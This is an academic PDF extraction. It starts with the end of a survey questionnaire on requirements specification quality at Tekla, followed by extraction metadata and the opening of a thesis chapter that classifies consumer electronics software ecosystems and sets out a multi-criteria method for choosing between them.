<td>The requirements are described using language that a non-technical person understands.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>The requirements are based on the information gained from users or customers.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>In all likelihood, there are moderately few errors in the requirements.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>The correctness of the requirements is checked with real users.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>There were many differences in the views of the parties in requirements engineering.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
The analysis of requirements
The requirements were analyzed and described using several methods, please; indicate how useful you evaluate them?
<table>
<thead>
<tr>
<th></th>
<th>Useless (1)</th>
<th>(2)</th>
<th>Useful (4)</th>
<th>don't know</th>
</tr>
</thead>
<tbody>
<tr>
<td>Current situation tables</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
</tr>
<tr>
<td>Problems in current user interface pictures</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
</tr>
<tr>
<td>Requirements in Caliber</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
</tr>
<tr>
<td>Comments from users</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
</tr>
<tr>
<td>Use cases</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
</tr>
<tr>
<td>Navigation map</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
</tr>
<tr>
<td>User interface pictures</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>
What is good in varied descriptions?
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
What is problematic in varied descriptions?
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
What would you recommend? How should requirements be analyzed and described in Tekla?
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
Other comments:
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
The average quality of the specifications in Tekla
Please indicate the strength of your agreement/disagreement with the following statements concerning the average quality of the specifications in Tekla.
1 = strongly disagree, 2 = disagree, 3 = agree, 4 = strongly agree, 5 = no opinion, don't know
<table>
<thead>
<tr>
<th></th>
<th>Disagree</th>
<th>Agree</th>
<th>don't know</th>
</tr>
</thead>
<tbody>
<tr>
<td>I consider the specification a success.</td>
<td>1</td>
<td>2</td>
<td>3</td>
</tr>
<tr>
<td>Customer or user requirements are completely defined.</td>
<td>1</td>
<td>2</td>
<td>3</td>
</tr>
<tr>
<td>All the essential issues from the customer and user point of view are documented.</td>
<td>1</td>
<td>2</td>
<td>3</td>
</tr>
<tr>
<td>The document describes functions that meet the user needs.</td>
<td>1</td>
<td>2</td>
<td>3</td>
</tr>
<tr>
<td>The customer and user processes that the system is designed to support are analyzed and documented.</td>
<td>1</td>
<td>2</td>
<td>3</td>
</tr>
<tr>
<td>The requirements are understandable for those who are not part of the project.</td>
<td>1</td>
<td>2</td>
<td>3</td>
</tr>
<tr>
<td>The requirements are described using language that a technical person understands.</td>
<td>1</td>
<td>2</td>
<td>3</td>
</tr>
<tr>
<td>The requirements are described using language that a non-technical person understands.</td>
<td>1</td>
<td>2</td>
<td>3</td>
</tr>
<tr>
<td>The requirements are based on the information gained from users or customers.</td>
<td>1</td>
<td>2</td>
<td>3</td>
</tr>
<tr>
<td>In all likelihood, there are moderately few errors in the requirements.</td>
<td>1</td>
<td>2</td>
<td>3</td>
</tr>
<tr>
<td>The correctness of the requirements is checked with real users.</td>
<td>1</td>
<td>2</td>
<td>3</td>
</tr>
<tr>
<td>There were many differences in the views of the parties in requirements engineering.</td>
<td>1</td>
<td>2</td>
<td>3</td>
</tr>
</tbody>
</table>
Thank you very much!
References
|
{"Source-Url": "https://research.aalto.fi/files/2083051/BITskujala08manuscript.pdf", "len_cl100k_base": 12560, "olmocr-version": "0.1.53", "pdf-total-pages": 27, "total-fallback-pages": 0, "total-input-tokens": 70484, "total-output-tokens": 16805, "length": "2e13", "weborganizer": {"__label__adult": 0.0004820823669433594, "__label__art_design": 0.002399444580078125, "__label__crime_law": 0.0003733634948730469, "__label__education_jobs": 0.0214691162109375, "__label__entertainment": 0.00014543533325195312, "__label__fashion_beauty": 0.0002777576446533203, "__label__finance_business": 0.001041412353515625, "__label__food_dining": 0.0004954338073730469, "__label__games": 0.001068115234375, "__label__hardware": 0.001079559326171875, "__label__health": 0.0006799697875976562, "__label__history": 0.0006189346313476562, "__label__home_hobbies": 0.0001829862594604492, "__label__industrial": 0.0006861686706542969, "__label__literature": 0.0009136199951171876, "__label__politics": 0.0003840923309326172, "__label__religion": 0.000751495361328125, "__label__science_tech": 0.031402587890625, "__label__social_life": 0.00017464160919189453, "__label__software": 0.01085662841796875, "__label__software_dev": 0.92333984375, "__label__sports_fitness": 0.00031828880310058594, "__label__transportation": 0.0006270408630371094, "__label__travel": 0.00022733211517333984}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 73008, 0.03615]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 73008, 0.2007]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 73008, 0.93867]], "google_gemma-3-12b-it_contains_pii": [[0, 452, false], [452, 3264, null], [3264, 7382, null], [7382, 7814, null], [7814, 12248, null], [12248, 14430, null], [14430, 18932, null], [18932, 23100, null], [23100, 27359, null], [27359, 30022, null], [30022, 30989, null], [30989, 35129, null], [35129, 38315, null], [38315, 39644, null], [39644, 42825, null], [42825, 43919, null], [43919, 44972, null], [44972, 48141, null], [48141, 51876, null], [51876, 55872, null], [55872, 58388, null], [58388, 60531, null], [60531, 62410, null], [62410, 64793, null], [64793, 67251, null], [67251, 70118, null], [70118, 73008, null]], "google_gemma-3-12b-it_is_public_document": [[0, 452, true], [452, 3264, null], [3264, 7382, null], [7382, 7814, null], [7814, 12248, null], [12248, 14430, null], [14430, 18932, null], [18932, 23100, null], [23100, 27359, null], [27359, 30022, null], [30022, 30989, null], [30989, 35129, null], [35129, 38315, null], [38315, 39644, null], [39644, 42825, null], [42825, 43919, null], [43919, 44972, null], [44972, 48141, null], [48141, 51876, null], [51876, 55872, null], [55872, 58388, null], [58388, 60531, null], [60531, 62410, null], [62410, 64793, null], [64793, 67251, null], [67251, 70118, null], [70118, 73008, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 73008, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 73008, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 73008, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 73008, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 73008, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 73008, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 73008, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 73008, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 73008, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 73008, null]], "pdf_page_numbers": [[0, 452, 1], [452, 3264, 2], [3264, 7382, 3], [7382, 7814, 4], [7814, 12248, 5], [12248, 14430, 6], [14430, 18932, 7], [18932, 23100, 8], [23100, 27359, 9], [27359, 30022, 10], [30022, 30989, 11], [30989, 35129, 12], [35129, 38315, 13], [38315, 39644, 14], [39644, 42825, 15], [42825, 43919, 16], [43919, 44972, 17], [44972, 48141, 18], [48141, 51876, 19], [51876, 55872, 20], [55872, 58388, 21], [58388, 60531, 22], [60531, 62410, 23], [62410, 64793, 24], [64793, 67251, 25], [67251, 70118, 26], [70118, 73008, 27]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 73008, 0.18015]]}
|
olmocr_science_pdfs
|
2024-12-06
|
2024-12-06
|
48519e939109cac22427c4073cfc5cc22097ca84
|
Chapter 3. Consumer Electronics Software Ecosystems
This chapter is an extended version of the article which is published as:
Abstract
Due to the increasing size of software and because consumer electronics products are more and more connected to the internet, many consumer electronics firms are adopting an ecosystem centric approach for supporting 3rd party applications. In a mature market where successful platforms are available, a firm will mostly choose an existing platform. In an emerging market, a consumer electronics firm may need to create a new ecosystem or adopt a newly developed platform, both which has significant commercial and technical implications.
In this paper we identify three types of ecosystems that are used today: Vertically integrated hardware/software platforms, closed source software platforms and open source software platforms. We introduce a first step towards a multi-criteria decision support method. This method determines which of the three types of ecosystem is most likely to become successful for a specific product category. The method is based on the scope and technology design of the platform and takes a software engineering perspective.
We use this method to analyze a wide range of consumer electronics products. We show that the vertically integrated platform type is most suitable for product with a high degree of innovation and that open source software platforms are more suitable when a large amount of variants are needed to serve the market. The closed source software platform type is less suitable for consumer electronics, especially for products which require an optimal use of system resources and have a large degree of innovation.
Consumer electronics manufacturers can use this method to select the ecosystems type that they want to adopt or create. Firms that create software platforms can use this method to select the product types they want to target.
3.1 Introduction
Consumer electronics products have radically changed over the past two decades. Initially the functionality of these products, including products such as CD and DVD players, televisions and radios, was mainly implemented through hardware. Due to the reduced costs
for integrated circuits (ICs) and increased capabilities of these ICs more and more of the functionality is now implemented through software [Hartmann 2012], furthermore many products are now connected to the internet and support the downloading of applications in addition to the applications that are embedded in the devices.
Initially the products were entirely developed by individual firms, but nowadays 3rd parties are used for the development of software components. Specifically for downloadable applications, it is not feasible for an individual company to develop these applications themselves. As a result, many firms are adopting an ecosystem centric approach in which 3rd parties are supported to develop applications for their products.
In a mature market where there are existing ecosystems, a consumer electronics firm will usually choose an existing platform and this choice is largely determined by the commercial aspects, e.g. the amount of 3rd party applications and the license fees, and functional requirements, e.g. whether the platform supports the specific features that the a firm wants to offer. In an emerging market, i.e. when there are no existing or no dominant ecosystems, a consumer electronics firm may decide to create a new ecosystem and software vendors may decide to create software platforms to serve this market. As an example consider the smart phone market. Nowadays that there are a few dominant ecosystems, and manufacturers of devices usually choose an existing platform, which is typically Android, Windows or Tizen. In the early years new ecosystems were created by consumer electronics firms such as Nokia, BlackBerry and Apple, and software platform vendors entered the market, e.g. Microsoft and Google. Some of these ecosystems became successful while other disappeared after a few years.
The adaption of ecosystem has significant implications, both commercially and technically. For instance, if a company decides to open its own platform for 3rd parties, it has to attract sufficient parties and it has to maintain its own ecosystem. When a company decides to adopt an existing software platform, changes are required to the architecture and a significant part of the revenues may go the platform owner. Furthermore it has to be confident that the adopted ecosystem will become successful. The success of an ecosystem relies on many aspects which includes the scope and design of the platform, how the platform owner co-operates with the complementors, how each of the participants is able to obtain revenues, how the sales channels are organized and how the platform is able to deal with changing requirements [Popp 2010, Gawer 2008, Axelsson 2014].
In this paper we classify the type of ecosystems that are used for consumer electronics and identify the strengths and challenges of each type, thus serving as a reference for emerging markets. Furthermore we analyze, giving the requirements from the market, which of the identified types is likely to become successful for a specific type of product from a software engineering perspective.
This paper answers the following research questions:
- What types of ecosystems are used in consumer electronics products to support 3rd party applications?
- Which of the ecosystems types is most suitable for a specific product category from a software engineering perspective?
To answer the first question a variety of consumer electronics domains are studied, resulting in a taxonomy. To answer the second research question, we introduce a multi-
Consumer Electronics Software Ecosystems
criteria decision support method [Gella 2006]. The decisions support method analyzes the scope and technology design for a software platform [Gawyer 2002] w.r.t. it's abilities to meet the functional and non-functional requirements.
Our method finds its origin in methods for selecting software components and software vendors [Nazir 2014, Alpar 1998] and similarly uses multiple criteria which are based on an expert opinion and are using ordinal scales [Cooper 2011]. The criteria to evaluate types of ecosystems are general market requirements [Bolwijn 1990, Sheat 2010], requirements from the nature of consumer electronic devices [Henzinger 2006, Trew 2011], and requirements from the use of ecosystems [Messerschmitt 2004, Bosch 2010, Underseth 2007]. For each type of ecosystem we identify the strengths and challenges from a software engineering perspective. The decision support method is based on comparing the requirements for a product type with the strengths and challenges of the ecosystem types.
Since our decision support method does not cover commercial and organizational aspects we do not claim that our method is complete and this method is therefore a first step towards a full-fledged decision support method.
This paper is structured as follows. In Section 3.2 background is provided on consumer electronics. In Section 3.3 a classification of ecosystems is given. Section 3.4 describes the first steps towards a multi-criteria decision support method. Section 3.5 describes the case studies. This paper is concluded with a comparison with related art in Section 3.6, and our conclusions and a description of further research in Section 3.7.
3.2 Background on Consumer Electronics Products
3.2.1 Trends and challenges
Current consumer electronics products have characteristics of embedded devices as well as general purpose computing devices [Hartmann 2012]. As an embedded device they are aimed to perform dedicated functions, such as making telephone calls, playing games or movies, which have real-time performance requirements. There is a high pressure on cost price and therefore the integrated circuits (ICs) should operate as efficient as possible and using ICs with the smallest footprint achievable. Consumer electronics devices have constrained computing resources and should use as little energy as possible because they often have few options for heat dissipation. For mobile devices, which operate on batteries, this is even more important. As a consequence a consumer electronic product contains as little hardware and software components as possible.
These devices also have characteristics of general purpose computing devices because they are meant for a variety of tasks such as Internet browsing, reading and writing documents, accessing social media and playing games.
The combination of these two characteristics leads to numerous architectural and commercial challenges. As an example, consider Flash, an Internet browser plugin for watching videos. Apple has not allowed the use of Flash on their smart phones and tablets because it causes a significant shortened battery life [Jobs 2011], but has promoted the use of the H.264 video encoding standard for which their device is optimized.
3.2.2 System architecture
In Figure 13 a high level system architecture of consumer electronics products is presented that support 3rd party applications, showing some of the actors for different product types.
The architecture consists of a hardware platform an OS-kernel and middleware that offers a framework for application developers [Halasz 2011, Trew 2011]. The hardware layer consists of a System on Chip (SoC) with peripheral ICs. A SoC contains several dedicated building blocks on a single IC such as audio decoding, memory and a configured CPU. A dedicated SoC, which is common for embedded systems, is better able to meet the performance requirements at lower power consumption than using a general purpose CPU and separate ICs, as in the PC industry. The design of the software and the SoC are tightly coupled, e.g. for controlling the power consumption of separate hardware building blocks.
Figure 13 System architecture of consumer electronics products that support 3rd party applications
3.3 A Classification of Ecosystem Types
This section describes the move towards ecosystem and provides a classification of ecosystems that are used today.
3.3.1 Growing software size: move towards ecosystems
In an earlier paper we analyzed the transition in the consumer electronics industry from 1990 until 2010 [Hartmann 2012]. Initially these products were developed by vertically integrated companies that developed the hardware, firmware, applications as well as created the end products. Examples of companies that create traditional consumer electronics products such as Televisions, DVD players and Radios are: Philips, Sony and Matshushita. Examples of companies that created the first generation of mobile phones are: Nokia, Siemens, Ericsson and Motorola.
Over time, an increasing proportion of the functionality was implemented through software and this introduced the need for dedicated application processors and operating systems. The development investments, both for hardware and software, became significantly higher and therefore the companies needed to focus their activities. Separate
hardware platform suppliers were created as spin-offs of the vertically integrated companies, such as Qualcomm [Qualcomm 2014], NXP and Freescale. When hardware platforms and other components became commodities it was possible for newcomers to enter the market without large investments. Examples of these newcomers are TCL, HTC and Apple in the market of mobile and smart phones and Dell, Apple and Microsoft in the market of digital televisions and set-top boxes.
Several software vendors entered the market and created a common software platform in an attempt to replicate the Wintel model [Grove 1996, West 2011]. Similarly as the case with Microsoft Windows, a firm controlling the spanning layer can earn most of the revenues since it controls the interface towards the hardware as well as towards the applications [Messerschmitt 2004, Baldwin 1997]. The number of competing mobile platforms that entered the market was significant, e.g. WebOS, Android, LiMo, Symbian, Windows Mobile, MeeGo etc. Similarly in the domain of digital televisions and set-top boxes, multiple platforms entered the market, such as Windows, Horizon TV and OpenTV. Until 2009 most of these attempts didn’t gain industry wide adoption and the industry was highly fragmented.
In the mobile domain, starting in 2010, many of the vertically integrated firms lost market share and Android, an open source software platform, gained a share rapidly. Furthermore the dominant player in the PC market, Microsoft, increased their efforts to gain market share. For other consumer electronics products, such as digital televisions, and digital cameras a similar transition occurs in which vertically integrated companies start adopting open source software platforms [Engadget 2014]. As a result there is a fierce battle between different ecosystems in the market of many consumer electronics products.
3.3.2 Classification of ecosystems with their complementors
This paper discusses ecosystems for consumer electronics that are aimed to support 3rd party applications. For a comparison of these ecosystems we use a classification that is based on two properties: (1) is the software proprietary or open source, and (2) are the hardware and device included. Figure 14 shows this classification with examples from the domain of smart phones.
<table>
<thead>
<tr>
<th>Software Platform only</th>
<th>(2) Windows WebOS (2010-2012)</th>
<th>(3) Android, Tizen, Firefox OS</th>
</tr>
</thead>
<tbody>
<tr>
<td>Hardware and device included</td>
<td>(1) Apple, RIM Nokia (< 2013)</td>
<td>(4) Not present in the market</td>
</tr>
</tbody>
</table>
Proprietary closed Source | Open Source
Figure 14 Classification of ecosystem types with examples from smart phones
Chapter 3
This classification results in four possible ecosystems:
1: Vertically integrated proprietary hardware/software platform. This platform consists of the hardware, proprietary closed source software and includes the device. The complementors are the application (App) developers.
- Examples of platforms and their leaders for smart phones: Apple with the iPhone, Rim with Blackberry and Nokia with Asha.
- Examples for digital televisions and set-top boxes: LG with WebOS, Apple with AppleTV, Samsung with Smart TV.
- Examples for personal computers: Apple with OS X.
2: Proprietary, closed source software platform. This platform consists of a proprietary closed source software platform. The complementors are the suppliers of hardware platforms, system integrators, device manufacturers and application developers.
- Examples of such platforms for smart phones: Windows Phone and WebOS (2010-2012).
- Examples for digital televisions and set-top boxes: Horizon TV, Microsoft TV.
- Examples for personal computers: Microsoft Windows.
3: Open source software platform. This platform consists of an open source software platform. The open source software platform is based on the concept that multiple parties can contribute to share development effort and since the source is open, the device manufacturers can change, add or remove functionality. The complementors are the suppliers of hardware platforms, system integrators, device manufacturers and application developers.
- Examples for smart phones are Android, Tizen and Firefox OS.
- Examples for digital televisions and set-top boxes: Android, Meego, Ubuntu TV.
- Examples for personal computers: Chrome OS, Linux, FreeBSD.
4: Open source software and hardware platform. This platform would consist on an open source software platform including the hardware and device. The users of such a platform, or better product, would be able to change the code of the software platform and add their own functionality. We have excluded this type from this paper as this type, to our knowledge, is not available in the market. Note that in the past some handset makers of smart phones used an open source platform of which they acted as the platform leader, e.g. Nokia that used Symbian when it was open source and Motorola of Google that used Android. In this situation the handset makers are in-house complementors of the open source software platform and therefore the combination is not a separate type of ecosystem.
3.4 Towards a Multi-Criteria Decision Support Method
This section describes the first step towards a multi-criteria decision support method for selecting the most suitable ecosystem type for a certain product category. This section starts with an overview of the method, followed by the background. Then each step is explained in detail.
3.4.1 Overview of the method
This method is based on comparing the strength and challenges of each ecosystem type with the market requirements of a product category. As shown in Figure 15, the method consists of 3 steps:
Step 1: For a product category the most important requirements are determined.
Step 2: The strengths and challenges of the three types of ecosystem type are identified for these requirements.
Step 3: A decision support matrix is created that shows a total score per ecosystem type, based on the importance of the requirements and the strengths and challenges of the ecosystem types.
Figure 15 Multi-Criteria Decision Support Method
This method uses similar steps and techniques as those that are used for the selection of software suppliers and software components [Nazir 2014]. In these methods similarly a multi-criteria analysis [Gella 2006] is used to compare multiple criteria, or requirements, with the ability of the supplier, or software component, to fulfill them [Alpar 2010]. In these methods a decision matrix is used to rank the options so that the decision can be made more objective [Pugh 1996], and ordinal scales [Cooper 2011] are used as part of these methods since quantitative information is mostly not available [Goulão 2007]. The decision support matrix is used in the same way as these method to support the selection of alternatives based on a multi-criteria analysis, and the importance and evaluation of the criteria are based on an expert opinion.
Since ordinal scales are used for the requirements and for the total score, the values do not represent absolute numbers but are solely used as a scale to express the differences between the types of ecosystems.
Section 3.5 presents case studies for different product categories. Step 2 of the decision support method is independent from the product category and therefore the strengths and challenges of the three identified ecosystems are described in Section 3.4.4 and then used in the case studies in Section 3.5.
3.4.2 Background of the method
3.4.2.1 Platform scope and technology design
Gawer and Cusumano designed a framework for a company to become a platform leader. A platform leader is driving the innovation in the industry, ensures the integrity of the overall system and creates opportunities for firms that create complementary products [Gawer 2002]. This framework includes (1) how a company defines the scope of the platform, i.e. what part of the product is developed in-house and what it leaves for complementary firms, (2) the technology design, e.g. to what degree the platform should be open to the complementors and how the interfaces are defined (3) how external relations are managed (4) how the internal organization is structured [Gawer 2008].
The scope and technology design highly determine the success of a platform. It should support the capabilities of the platform leader, allow for complementors to contribute and be able to respond to changing requirements. While all three ecosystem types provide a platform for 3rd party developers, they differ in the contributions the complementors can make to the final product and to what degree the complementors can alter in the platform.
For the vertically integrated platform type the scope is very wide and the complementors have no options to contribute or alter the platform. The closed source platform types provide the system integrators and device manufacturers the possibility to add distinguishing functionality but leaves little to no options to alter the platform, e.g. to make changes to the API (Application Programming Interface) and interfaces towards the hardware layer. The open source software platform provide the complementors the options to contribute to the platform and make changes to the platform thus allowing a large degree of freedom. The latter also leads to risks because the platform owner may lose control over the platform [Iansito 2004].
Since the scope and technology design constitute the largest differences between the three identified types of ecosystems, this is the basis of the decision support method.
3.4.2.2 Evaluation criteria
In order to evaluate the best suitable scope and technology design for a platform, it is needed to define the criteria that determine this. Here we draw an analogy between the selection of an ecosystem type and the selection of software components [Nazir 2014] and the selection of a software vendor [Alpar 2010].
A selection of software component is based on whether it fulfills the functional and architectural requirements as well it is able to address nonfunctional requirements. This set includes: Costs of the components, quality, whether it fits the architecture, is modifiable, maintainable, portable and so on [Kontio 2010]. A supplier selection is typically based on the abilities of a supplier to fulfill the functional and non-functional requirements [Alpar 2010] and includes the maturity of an organization, its customer base, and the way it cooperates with its customers. Since we use the requirements from the market we will further use the term requirements to describe the criteria.
The requirements that will be used in our decision support method, is a combination of those that are used for component and supplier selection. Similar as with a vendor selection,
the choice for an ecosystem is based on its abilities to fulfill the functional and non-functional requirements. Similar as with the selection of components, an ecosystem type has to be able to provide a platform which fulfills the architectural requirements.
For evaluating the non-functional requirements we use the competitive forces of Bolwijn and Kumpe [Bolwijn 1990] which determine the success of a consumer electronics firms: Cost, Quality, Flexibility and Innovation. In a later analysis Sheate [Sheat 2010] identified Variability as a requirement, which is strongly related to flexibility. In this context cost is interpreted as the software development cost since reproduction costs for software are negligible.
The key architectural requirements for embedded systems and consumer electronics products are: Efficient use of system resources and hard real time requirements [Henzinger 2006, Trew 2011].
Furthermore we use requirements that are specific for ecosystems, namely: Stability of the interface since complementors have to rely on a stable and, ideally, backwards compatible interface [Messerschmitt 2004, Jansen 2013], and Effort for system integration, since for the set-makers the integration of the hardware and software is a substantial and increasing proportion of the development effort [Underseth 2007].
This gives the following set of requirements:
- **Development Costs, Quality, Variability, Speed of Innovation, System resources and hard real time requirements, Interface stability and Integration effort.**
In the following sections, these requirements are elaborated. Other criteria that determine the success of an ecosystem are not covered since this paper looks from a software engineering perspective.
### 3.4.3 Step 1: Identification of the important of each requirement for a product category
The requirements are evaluated based on the characteristics of the product and the market demands. For each requirement, it is determined whether it is “key”, meaning that it is an absolute necessity to support this, or of “high” importance.
- **Development cost:** This is based on the estimated size of the software, the effort that is required to maintain the platform and develop new functionality. This requirement will be evaluated as of high, or key, importance when the amount is large and continues enhancements are needed.
- **Quality:** This is based on the costs when a product or one of its functions fail which includes the useability of a product and the commercial impact of product failures.
- **Variability:** This is based on the amount of variants that are needed to satisfy the different market segments and customers. This typically includes different features, prize setting, screen size, the support of different regional standards etc..
- **Speed of Innovation:** This is based on the speed at which new products with new features are introduced and whether the new functionality is a reason for consumers to buy a (new) product. E.g. when a new product replaces an older version within one or two years, and customers replace their old product, the speed of innovation is determined as of high importance.
**System resources and hard real time requirements:** This based on the pressure of the cost price of the ICs, the need to ensure a good system performance, and the requirements for ensuring a long battery lifetime for mobile devices. So for small products, such as wearables, this is a very important requirement and also for products for which there is a high pressure on the cost price. When real time aspects are important, e.g. to play music and games without audible and visual interruptions, this requirement is also evaluated as of high importance.
**Interface stability:** This is based on whether the API has to be rigorously followed for an application to work correctly and whether a high amount of 3rd party applications is needed to gain sufficient traction in the market.
**Integration effort:** This is based on the development and test effort that is required to create an end-product using its software and hardware components. This is a result of the amount of hardware and software components that are used and whether the interfaces between them are stable, i.e. whether a modular architecture has been created. For innovative products that contain components with new functionality and changing interfaces the integration and test effort is high.
Note1: These requirements are not completely independent. For instance a high degree of innovation will cause higher development costs and integration effort.
Note2: We do not further distinguish between requirements that are of “Medium” or “Low” importance, since for such a fine-grained distinction our method is not sufficiently accurate and complete at this moment in time.
### 3.4.4 Step 2: Evaluation of the requirements for each ecosystem type
In this section we analyze each of the three types of eco-system and each requirement is “scored” on whether it is challenging or easier to address, i.e. a strength of an ecosystem type. Here + means: easier to address, 0 means: neutral, and - means: challenging. This analysis is based on the experience of the authors, the information in literature and the case studies that are presented in our earlier work [Hartmann 2014].
**A: Development Cost.** The larger the scope of the platform, the more development and maintenance effort is required by the platform owner. When multiple parties are involved these costs can be shared between the participants [Genuchten 2007]. Because hardware and software development is costly, this is the main reason why ecosystems became widely adopted. Firms that aim for low costs specialize on a few products so that tasks become routine [Bolwijn 1990]. Consequently products that are developed in consort by specialized firms, especially when interfaces are pre-defined, can be made at lower costs.
For the vertically integrated type this requirement is challenging since they develop the entire platform including both hardware and software and can only amortize their investments over their own devices (hence score = -). The open source platform can more easily address this, especially when the complementors contribute to the platform and often individual developers develop code in their free time [Gawer 2008] (hence score = +). For the proprietary software platform we evaluate this as neutral (score = 0): Although this
platform owner has to develop the platform on its own, the costs can be amortized over multiple products from different device manufacturers.
**B: Control over Quality.** The overall product quality depends on the combination of software from the different contributors and failures often occur because of component interaction, unclearly documented API or unknown use of the system [Trew 2006, Oberhauser 2007]. A firm that controls a wide scope of the architecture can guarantee the product quality more easily [Axelsson 2014]. In the situation where multiple firms are involved, and especially when the interfaces are not clearly defined, the quality can easily break down and externally developed code could access data in the system, causing malfunctioning or security problems. Furthermore, applications developed by complementors may not follow the UI standards, as set by the platform owner, thereby causing a reduced user experience [Bosch 2010, Jansen 2013].
The quality can be controlled easier by the vertically integrated platform type as they have full control over the end-product. Furthermore these firms are able to test the externally developed applications on their devices (hence score = +). For the proprietary platforms we evaluate this as neutral (score = 0): although they have no control over the hardware, they can control the API and, because of its closed nature, can easier avoid that code with defects is added to the platform. For the open source platform we also regard this as neutral (score = 0). Because of its open nature, faulty code can be added or code can be changed incorrectly by the complementors and applications may compromise the security. An advantage however, is that the software is developed and tested by a large variety of firms and open source developers.
**C: Variability:** Specialized firms can often add variability to a platform more easily [Moore 2006], e.g. because they have the required knowledge, can reuse existing hardware and software components and they can have a more intimate contact to the end-users [Bosch 2009].
Flexibility and variability is easier to achieve through the open source platform type, since complementors can add or remove functionality without the need to involve the platform owner (hence score = +). For the proprietary platform type we evaluate this as neutral (score = 0): The device manufactures can create differentiating products with different hardware configuration; however this is limited to that which is supported by the software platform. As a comparison look at the PC industry where the different OEM suppliers of a Windows based PC can only compete on price, service and hardware quality, since the functionality is largely determined by the proprietary software platform. For the vertically integrated platform owner it is far more difficult to cover a wide range of products. In order for a firm to be flexible and respond quickly, it needs to focus on a number of core activities [Bolwijn 1990] and the development of all the required hardware and software components would simply be too costly. We therefore evaluate that this as challenging for this type (score = -).
**D: Freedom to innovate:** The optimal definition of the boundaries depends on where the major innovation steps in the architecture take place. When innovation takes place across
Chapter 3
the boundaries of the platform the integrity of the platform is compromised and the complementors need to be involved thus slowing down the speed of innovation [Messerschmitt 2004]. Therefore, a wide scope allows for larger innovation steps more easily.
The introduction of multi touch screens in smart phones is such an example. Due to this innovation specialized hardware was needed; the interface towards the user has changed and a new API towards the application developers was required. Such a large innovation step couldn’t be done through small changes to an existing platform.
Large innovation steps are easier to establish by the vertically integrated platform type (score = +) because these firms control the entire architecture and complementors do not need to be involved. In the proprietary platform type the innovation is restricted because hardware is not part of the scope and the platform supplier has to involve hardware suppliers and device manufacturers for major steps (hence score = -). For the open source platform the hardware is also not part of the scope, however, the complementors may change the code and thus has the possibility for innovations, independently from the platform owner, for which the architecture does not have to be changed. Therefore we evaluate this as neutral (score = 0).
E: Efficient use of system resources and hard real time requirements: Due to the need for optimal resource utilization and low power consumption a direct control of the hardware is required. An embedded device usually contains a System on Chip (SoC) and each component is controlled separately. For instance, for video decoding in a digital television a separate building block of the SoC is used which can operate with low power consumption and is only active when needed. Furthermore, by controlling each part of the IC separately it can be avoided that processes interrupt each other. Therefore the design of the hard- and software are developed in parallel and require close co-operation [Halasz 2011].
As a comparison, look at the Wintel framework; the dominant ecosystem in the PC industry [Grove 1996]. This is a modular architecture with stable interfaces between the hardware and the software layer. Both Microsoft and Intel can independently innovate on their part of the architecture. Such a modular interface is possible because most demands of the end user can easily be met by existing hardware. For mobile phones such a modular interface is not yet possible since there are still large innovation steps that involve changes to hardware and software together and a modular architecture would lead to less efficient resource utilization [Christensen 2002].
Since the vertically integrated platform type has both control of the hardware and software this can controlled more easily (score = +). In the open source type the complementors can also change the code to accommodate the hardware and vice-versa and therefore this can also be controlled (hence score = +). For a proprietary platform type this is challenging since changes to hardware may require changes to the proprietary platform and vice versa (hence score = -).
F: Stability of the Interface: It is important for a platform to maintain a (sufficiently) stable API, thus avoiding that interoperability problems exist where applications do not work on the variety of devices based on different versions of a platform [Iansito 2004]. This
Consumer Electronics Software Ecosystems
fragmentation is seen as the major challenge by the application developers [Gadhavi 2010, Gilson 2012].
Vertically integrated platforms can more easily avoid fragmentation since they have full control over the API (hence score = +). This also holds for the closed source proprietary platform, similarly as the case in the PC industry, which has proven to be the major advantages and success of this type of platform [Moore 2006] (hence score = +). For an open source platform this is challenging since fragmentation can easily occur because device manufacturers can change the API or the hardware (hence score = -).
**G: Effort for system integration:** The time needed to integrate the hardware and software components is taking an increasing amount of time especially when components from different parties are used, e.g. with different technologies, non-matching interfaces or heterogeneous architectures [Henzinger 2006]. When a modular architecture exists with stable interfaces, the integration time would be substantially less [Christensen 2004]. Furthermore, when multiple parties are involved, the time for interaction, definition of requirements etc., is forming a substantial part of the development effort.
